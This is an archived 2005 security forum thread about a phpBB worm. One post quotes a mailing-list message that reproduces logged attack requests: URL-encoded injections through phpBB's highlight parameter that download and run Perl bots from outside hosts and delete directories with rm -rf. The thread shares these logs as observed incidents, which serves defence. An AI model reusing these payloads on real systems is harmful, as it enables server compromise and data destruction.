hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Phpbb Worm?
GovernmentSecurity.org > System Security > Trojan & Virus Errata
rpm
Jan 24 2005, 07:42 PM
Apparently there is some new ppBB worm going around like santy. Anyone have any info on it? Havent seen it posted anywhere.
belgther
Jan 25 2005, 10:56 AM
well, i have heard some phpBB exploits recently, but i don't know whether you mean them... one of them was the phpBB SQL Injection vulnerability due to character checking algorithm, but it is fixed quickly... the other one is published here in GSO, too, so search the forum for it.
andydis
Jan 25 2005, 02:48 PM
taken from a well known mailing list

QUOTE
Message: 11
Date: Sun, 23 Jan 2005 15:42:21 +0000
From: Andrew Smith <stfunub@gmail.com>
Subject: [Full-Disclosure] PHP Worms
To: full-disclosure@lists.netsys.com
Message-ID: <33713abc050123074237c24efb@mail.gmail.com>
Content-Type: text/plain; charset=US-ASCII

I thought these had stopped?
I'm still seeing thousands of them each day:

"GET/read100.php&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

* 20

"GET /read100.php&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd!
611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/l!
ocal/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f08
89555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

* 3

"GET /read100.php&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

* 1500

(just from today)

They seem to be getting promptly deleted from the host server (i'm yet
to find a live one) but I was under the impression that the initial
burst was over?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.